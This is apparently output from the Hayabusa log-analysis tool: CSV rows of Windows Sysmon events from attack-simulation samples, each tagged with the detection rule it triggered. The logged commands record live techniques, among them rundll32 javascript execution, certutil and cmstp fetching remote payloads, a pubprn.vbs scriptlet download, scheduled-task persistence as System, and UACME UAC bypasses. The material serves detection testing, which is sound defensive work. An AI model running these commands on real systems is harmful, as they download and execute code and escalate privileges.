+09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:15.252 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2296 | PGUID: 747F3D96-6657-5D3F-0000-0010D01A8D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication 
"";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} | LID: 0x413182 | PID: 1004 | PGUID: 747F3D96-6657-5D3F-0000-001011298D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,high,,Application Executed Non-Executable Extension,,../hayabusa-rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 7088 | PGUID: 
747F3D96-665C-5D3F-0000-0010096B8D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:20.262 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3076 | PGUID: 747F3D96-665C-5D3F-0000-0010DC6B8D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 | Process: C:\Windows\System32\certutil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 | LID: 0x413182 | PID: 4520 | PGUID: 747F3D96-665C-5D3F-0000-0010E37B8D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:21.867 
+09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49832 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\certutil.exe | PID: 4520 | PGUID: 747F3D96-665C-5D3F-0000-0010E37B8D00,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:21.867 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49833 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\certutil.exe | PID: 4520 | PGUID: 747F3D96-665C-5D3F-0000-0010E37B8D00,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:25.202 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6428 | PGUID: 747F3D96-6661-5D3F-0000-00107AB88D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:25.269 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5888 | PGUID: 
747F3D96-6661-5D3F-0000-00103CBD8D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,high,PrivEsc | Evas,Bypass UAC via CMSTP,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf | Process: C:\Windows\System32\cmstp.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf | LID: 0x413182 | PID: 6820 | PGUID: 747F3D96-6661-5D3F-0000-0010CBC88D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:30.237 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2244 | PGUID: 747F3D96-6666-5D3F-0000-001016F78D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:30.258 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4976 | PGUID: 
747F3D96-6666-5D3F-0000-0010C6F88D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:30.685 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | Process: C:\Windows\System32\forfiles.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | LID: 0x413182 | PID: 1464 | PGUID: 747F3D96-6666-5D3F-0000-0010AE068E00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | LID: 0x413182 | PID: 4336 | PGUID: 747F3D96-6666-5D3F-0000-0010DF098E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,low,Evas,Indirect Command Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:35.313 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c winrm qc -q | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5840 | PGUID: 747F3D96-666B-5D3F-0000-001051638E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:35.337 
+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""} | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1580 | PGUID: 747F3D96-666B-5D3F-0000-001033648E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:35.347 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6412 | PGUID: 747F3D96-666B-5D3F-0000-00107C668E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:35.838 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cscript //nologo ""C:\Windows\System32\winrm.vbs"" qc -q | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c winrm qc -q | LID: 0x413182 | PID: 3224 | PGUID: 747F3D96-666B-5D3F-0000-00102F7F8E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:35.838 +09:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:35.878 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cscript //nologo ""C:\Windows\System32\winrm.vbs"" i c wmicimv2/Win32_Process @{CommandLine=""calc""} | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent 
Cmd: cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""} | LID: 0x413182 | PID: 264 | PGUID: 747F3D96-666B-5D3F-0000-0010EF858E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:35.878 +09:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:36.421 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: C:\Windows\System32\cscript.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 3224 | PGUID: 747F3D96-666B-5D3F-0000-00102F7F8E00 | Hash: SHA1=23805C325D9D4F0A3467F6D2A402A259C376A7F0,MD5=D1B65A6CC7A53A0B68BEE51C639E8F01,SHA256=C948999A3823DA8EBA679F15ABAAEB5E057C91EB716A9DBF9F97FFD09E96CBF7,IMPHASH=2E1D1E35C17BE5497D2DE33F06DC41B4",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:36.534 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: calc | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x413182 | PID: 3872 | PGUID: 747F3D96-666C-5D3F-0000-00104BB78E00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:36.534 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:36.548 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: C:\Windows\System32\cscript.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 264 | PGUID: 747F3D96-666B-5D3F-0000-0010EF858E00 | Hash: SHA1=23805C325D9D4F0A3467F6D2A402A259C376A7F0,MD5=D1B65A6CC7A53A0B68BEE51C639E8F01,SHA256=C948999A3823DA8EBA679F15ABAAEB5E057C91EB716A9DBF9F97FFD09E96CBF7,IMPHASH=2E1D1E35C17BE5497D2DE33F06DC41B4",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Calculator Usage,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2916 | PGUID: 747F3D96-6670-5D3F-0000-001099048F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:40.385 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4720 | PGUID: 747F3D96-6670-5D3F-0000-00105F098F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f | Process: C:\Windows\System32\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f | LID: 0x413182 | PID: 7076 | PGUID: 747F3D96-6670-5D3F-0000-0010F9148F00 | Hash: SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Calculator Usage,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:41.793 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\Tasks\mysc | Process: C:\Windows\system32\svchost.exe | PID: 1028 | PGUID: 747F3D96-DCFE-5D3F-0000-001044D20000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:45.242 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4184 | PGUID: 747F3D96-6675-5D3F-0000-0010AA498F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:45.311 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6192 | PGUID: 747F3D96-6675-5D3F-0000-0010774E8F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:45.606 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct | LID: 0x413182 | PID: 4036 | PGUID: 747F3D96-6675-5D3F-0000-0010875C8F00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:45.606 +09:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 34 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 924 | PGUID: 747F3D96-5808-5D45-0000-00106CDC3E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
2019-08-03 18:46:48.726 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"PrivEsc - UAC bypass UACME-34 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Environment\windir: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\explorer.exe | PID: 924 | PGUID: 747F3D96-5808-5D45-0000-00106CDC3E00",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
2019-08-03 18:46:48.924 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: ""C:\Windows\System32\schtasks.exe"" /run /tn ""\Microsoft\Windows\DiskCleanup\SilentCleanup"" /i | Process: C:\Windows\System32\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 34 | LID: 0x18d3fb | PID: 1268 | PGUID: 747F3D96-5808-5D45-0000-0010D1FE3E00 | Hash: SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe""\system32\cleanmgr.exe /autoclean /d C: | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | LID: 0x18d3b3 | PID: 1380 | PGUID: 747F3D96-5809-5D45-0000-00100B233F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using Disk Cleanup,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
2019-08-03 18:46:49.436 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,PrivEsc - UAC bypass UACME-34 | DeleteValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Environment\windir | Process: C:\Windows\explorer.exe | PID: 924 | PGUID: 747F3D96-5808-5D45-0000-00106CDC3E00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
2019-08-03 18:46:49.502 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 924 | PGUID: 747F3D96-5808-5D45-0000-00106CDC3E00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 33 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
